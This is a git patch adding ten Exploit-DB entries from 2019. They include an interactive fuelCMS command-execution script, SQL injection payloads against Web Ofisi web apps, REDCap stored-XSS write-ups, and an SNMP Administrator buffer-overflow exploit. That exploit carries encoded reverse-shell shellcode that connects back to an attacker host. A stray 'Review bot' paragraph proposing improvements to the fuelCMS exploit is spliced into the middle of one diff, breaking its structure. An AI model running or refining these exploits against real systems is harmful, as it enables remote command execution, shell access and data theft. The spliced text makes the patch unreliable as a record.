From 7ec7ea72dee160087aa22cfd7355c1fda49861de Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 20 Jul 2019 05:02:15 +0000
Subject: [PATCH] DB: 2019-07-20
10 changes to exploits/shellcodes
MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
fuelCMS 1.4.1 - Remote Code Execution
Web Ofisi E-Ticaret 3 - 'a' SQL Injection
Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
Web Ofisi Emlak 2 - 'ara' SQL Injection
Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
Web Ofisi Rent a Car 3 - 'klima' SQL Injection
Web Ofisi Firma 13 - 'oz' SQL Injection
REDCap < 9.1.2 - Cross-Site Scripting
---
exploits/linux/webapps/47138.py | 34 +++++++
exploits/linux/webapps/47139.txt | 14 +++
exploits/linux/webapps/47140.txt | 21 +++++
exploits/linux/webapps/47141.txt | 14 +++
exploits/linux/webapps/47142.txt | 50 ++++++++++
exploits/linux/webapps/47143.txt | 15 +++
exploits/linux/webapps/47144.txt | 43 +++++++++
exploits/linux/webapps/47145.txt | 13 +++
exploits/php/webapps/47146.txt | 60 ++++++++++++
exploits/windows_x86/remote/47137.py | 136 +++++++++++++++++++++++++++
files_exploits.csv | 10 ++
11 files changed, 410 insertions(+)
create mode 100755 exploits/linux/webapps/47138.py
create mode 100644 exploits/linux/webapps/47139.txt
create mode 100644 exploits/linux/webapps/47140.txt
create mode 100644 exploits/linux/webapps/47141.txt
create mode 100644 exploits/linux/webapps/47142.txt
create mode 100644 exploits/linux/webapps/47143.txt
create mode 100644 exploits/linux/webapps/47144.txt
create mode 100644 exploits/linux/webapps/47145.txt
create mode 100644 exploits/php/webapps/47146.txt
create mode 100755 exploits/windows_x86/remote/47137.py
diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py
new file mode 100755
index 000000000..971baab76
--- /dev/null
+++ b/exploits/linux/webapps/47138.py
@@ -0,0 +1,34 @@
+# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
+# Date: 2019-07-19
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+
+import requests
+import urllib
+
+url = "http://127.0.0.1:8881"
+def find_nth_overlapping(haystack, needle, n):
+ start = haystack.find(needle)
+ while start >= 0 and n > 1:
+ start = haystack.find(needle, start+1)
+ n -= 1
+ return start
+
+while 1:
+ xxxx = raw_input('cmd:')
+ burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
+ proxy = {"http":"http://127.0.0.1:8080"}
+ r = requests.get(burp0_url, proxies=proxy)
+
+ html = ""
+ htmlcharset = r.text.find(html)
+
+ begin = r.text[0:20]
+ dup = find_nth_overlapping(r.text,begin,2)
+
+ print r.text[0:dup]
\ No newline at end of file
diff --git a/exploits/linux/webapps/47139.txt b/exploits/linux/webapps/47139.txt
new file mode 100644
index 000000000..b8d7f16b9
--- /dev/null
+++ b/exploits/linux/webapps/47139.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html
+# Demo Site: http://demobul.net/eticaretv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?a=
+Vulnerable Parameter: a (GET)
+Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf%
\ No newline at end of file
diff --git a/exploits/linux/webapps/47140.txt b/exploits/linux/webapps/47140.txt
new file mode 100644
index 000000000..57c3fdb22
--- /dev/null
+++ b/exploits/linux/webapps/47140.txt
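Review bot: When `find_nth_overlapping` finds no second occurrence of `begin` it returns -1, and `print r.text[0:dup]` then prints the response minus its last character rather than the whole response; the call site should treat a negative `dup` as "print everything", e.g. `print r.text[0:dup] if dup >= 0 else r.text`. The two lines `html = ""` and `htmlcharset = r.text.find(html)` are dead code, since `htmlcharset` is never read, and can be dropped. `find_nth_overlapping` has no docstring; a one-liner such as `"""Return the start index of the n-th occurrence of needle in haystack, or -1 if there are fewer than n."""` would record the -1 convention the caller depends on. The header states the tested server stack but not the interpreter, and `raw_input` plus the `print` statement make this Python 2 only, which a `# Python 2` line in the header would make explicit.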
@@ -0,0 +1,21 @@
+# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html
+# Demo Site: http://demobul.net/eticaretv5/
+# Version: v5
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/arama?kategori=&q=
+Vulnerable Parameter: q (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/ajax/productsFilterSearch
+Vulnerable Parameter: q (POST)
+Payload:
+kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1
\ No newline at end of file
diff --git a/exploits/linux/webapps/47141.txt b/exploits/linux/webapps/47141.txt
new file mode 100644
index 000000000..d3bf8ec78
--- /dev/null
+++ b/exploits/linux/webapps/47141.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
+# Demo Site: http://demobul.net/emlakv2/
+# Version: v2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?ara=
+Vulnerable Parameter: ara (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47142.txt b/exploits/linux/webapps/47142.txt
new file mode 100644
index 000000000..d238692fb
--- /dev/null
+++ b/exploits/linux/webapps/47142.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html
+# Demo Site: http://demobul.net/emlakv3/
+# Version: V2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_durumu (GET)
+Payload: -1' OR 3*2*1=6 AND 000744=000744 --
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_tipi (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: il (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: ilce (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: kelime (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 6: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: semt (GET)
+Payload: -1' OR 3*2*1=6 AND 000531=000531 --
\ No newline at end of file
diff --git a/exploits/linux/webapps/47143.txt b/exploits/linux/webapps/47143.txt
new file mode 100644
index 000000000..c166342a0
--- /dev/null
+++ b/exploits/linux/webapps/47143.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html
+# Demo Site: http://demobul.net/firma-rehberi-v1/
+# Version: v1
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request:
+http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni
+Vulnerable Parameters: il,kelime,kat (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47144.txt b/exploits/linux/webapps/47144.txt
new file mode 100644
index 000000000..b0f169f23
--- /dev/null
+++ b/exploits/linux/webapps/47144.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
+# Demo Site: http://demobul.net/rentacarv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: kategori[] (GET)
+Payload: if(now()=sysdate(),sleep(0),0)
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: klima[] (GET)
+Payload: 1 AND 3*2*1=6 AND 695=695
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: yakit[] (GET)
+Payload: 1 AND 3*2*1=6 AND 602=602
\ No newline at end of file
diff --git a/exploits/linux/webapps/47145.txt b/exploits/linux/webapps/47145.txt
new file mode 100644
index 000000000..b6da6ab60
--- /dev/null
+++ b/exploits/linux/webapps/47145.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
+# Demo Site: http://demobul.net/firmav13/
+# Version: v13
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
+Vulnerable Parameters: oz[] (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/php/webapps/47146.txt b/exploits/php/webapps/47146.txt
new file mode 100644
index 000000000..987fbb85b
--- /dev/null
+++ b/exploits/php/webapps/47146.txt
@@ -0,0 +1,60 @@
+# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting
+# Date: 2019-07-19
+# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://projectredcap.org
+# Software Link: https://projectredcap.org
+# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2
+# Tested on: 9.1.0
+# CVE: CVE-2019-13029
+# Security advisory: https://gitlab.com/snippets/1874216
+
+### Stored XSS n°1 – Project name (found by Dylan GARNAUD)
+
+Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it.
+
+- Where? In project name
+- Payload: ``
+- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages.
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified
+
+### Stored XSS n°2 – Calendar (found by Dylan GARNAUD)
+
+- Where? Calendar event
+- Payload: ``
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12
+
+### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD)
+
+- Where? Wherever there is a CSV upload feature with displayed parsed results
+- Payload:
+ ```csv
+ record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete
+ ,,
+ ```
+- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered.
+- Privileges: It requires admin privileges to store it.
+- URL examples of execution:
+ + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index
+ + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16
+
+### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI)
+
+- Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue)
+- Payload: ``
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16
+
+### Stored XSS n°5 – Survey (found by Alexandre ZANNI)
+
+- Where? In the survey management system.
+ + Store: One has to select a project, go in the *Designer* section, choose *Survey Settings* and then store the payload in the WYSIWYG editor section named *Survey Instructions* (the same happens for *Survey Completion Text*).
+ + Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS.
+- Payload:
+ ```html
+
+ ```
+- Privileges:
+ + Store: It requires admin privileges to store it.
+ + Execute: Any unauthenticated user that can consult a survey.
\ No newline at end of file
diff --git a/exploits/windows_x86/remote/47137.py b/exploits/windows_x86/remote/47137.py
new file mode 100755
index 000000000..3144dedf0
--- /dev/null
+++ b/exploits/windows_x86/remote/47137.py
@@ -0,0 +1,136 @@
+# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
+# Author: sasaga92
+# Discovery Date: 2019-07-18
+# Vendor Homepage: www.computerlab.com
+# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
+# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
+# Tested on OS: Windows XP SP2 x86
+# CVE: N/A
+# [+] Credits: John Page (aka hyp3rlinx)
+
+
+#!/usr/bin/python
+
+import sys
+import socket
+import random
+import string
+import struct
+
+
+
+def pattern_create(_type,_length):
+ _type = _type.split(" ")
+
+ if _type[0] == "trash":
+ return _type[1] * _length
+ elif _type[0] == "random":
+ return ''.join(random.choice(string.lowercase) for i in range(_length))
+ elif _type[0] == "pattern":
+ _pattern = ''
+ _parts = ['A', 'a', '0']
+ while len(_pattern) != _length:
+ _pattern += _parts[len(_pattern) % 3]
+ if len(_pattern) % 3 == 0:
+ _parts[2] = chr(ord(_parts[2]) + 1)
+ if _parts[2] > '9':
+ _parts[2] = '0'
+ _parts[1] = chr(ord(_parts[1]) + 1)
+ if _parts[1] > 'z':
+ _parts[1] = 'a'
+ _parts[0] = chr(ord(_parts[0]) + 1)
+ if _parts[0] > 'Z':
+ _parts[0] = 'A'
+ return _pattern
+ else:
+ return "Not Found"
+
+def pwned(_host, _port, _payload):
+ print "[*] Conectandose a {0}:{1}...".format(_host, _port)
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((_host, _port))
+ print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
+ _payload = "{0}\r\n\r\n".format(_payload)
+ s.send(_payload)
+ _data = s.recv(1024)
+ s.shutdown
+ s.close
+ print 'Recibido:', repr(_data)
+ print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))
+
+
+def main():
+
+ _host = "192.168.0.12"
+ _port = 987
+ _offset_eip = 642200
+ _padding = 642144
+ _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
+ _tag = "w00tw00t"
+
+ #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 
LPORT=443 -e x86/alpha_mixed -f c + _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" + "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" + "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" + "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d" + "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70" + "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44" + "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f" + "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59" + "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42" + "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e" + "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51" + "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53" + "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b" + "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34" + "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63" + "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50" + "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b" + "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e" + "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44" + "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b" + "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b" + "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52" + "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c" + "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e" + "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64" + "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e" + "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b" + "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72" + "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70" + 
"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a" + "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45" + "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46" + "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57" + "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31" + "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f" + "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75" + "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70" + "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78" + "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36" + "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49" + "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58" + "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70" + "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55" + "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a" + "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65" + "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79" + "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31" + "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37" + "\x70\x73\x63\x69\x6f\x59\x45\x41\x41") + + _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + + _inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode)) + _inject += _tag + _inject += _shellcode + _inject += _egghunter + _inject += pattern_create("trash B", _offset_eip-len(_inject)) + _inject += _eip + + print(_inject) + pwned(_host,_port,_inject) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8692a374b..19425eec4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -17560,6 +17560,7 @@ id,file,description,date,author,type,platform,port
 47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
+47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41514,3 +41515,12 @@ id,file,description,date,author,type,platform,port
 47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
 47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux,
 47136,exploits/linux/webapps/47136.txt,"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting",2019-07-18,LiquidWorm,webapps,linux,
+47138,exploits/linux/webapps/47138.py,"fuelCMS 1.4.1 - Remote Code Execution",2019-07-19,0xd0ff9,webapps,linux,
+47139,exploits/linux/webapps/47139.txt,"Web Ofisi E-Ticaret 3 - 'a' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47140,exploits/linux/webapps/47140.txt,"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47141,exploits/linux/webapps/47141.txt,"Web Ofisi Emlak 2 - 'ara' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47142,exploits/linux/webapps/47142.txt,"Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47143,exploits/linux/webapps/47143.txt,"Web Ofisi Firma Rehberi 1 - 'il' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47144,exploits/linux/webapps/47144.txt,"Web Ofisi Rent a Car 3 - 'klima' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,